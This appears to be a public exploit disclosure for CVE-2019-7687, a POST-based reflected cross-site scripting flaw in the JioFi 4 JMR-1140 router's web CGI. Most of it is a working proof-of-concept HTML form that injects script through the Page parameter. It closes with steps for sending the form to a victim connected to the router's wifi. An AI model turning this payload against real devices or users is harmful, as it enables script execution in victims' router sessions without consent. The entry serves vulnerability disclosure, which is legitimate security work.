# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting # Date: 12.02.2019 # Exploit Author: Ronnie T Baby # Contact:https://www.linkedin.com/in/ronnietbaby # Vendor Homepage: www.jio.com # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 # Category: Hardware (Wifi Router) # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-7687 Description: cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. 1. Create a poc.html and insert <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" /> <input type="hidden" name="mask" value="0" /> <input type="hidden" name="token" value="0" /> <input type="submit" value="Submit request" /> </form> </body>d </html> 2. Send to victim(who is connected to the wifi network). 3. Post based Xss gets fired . Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.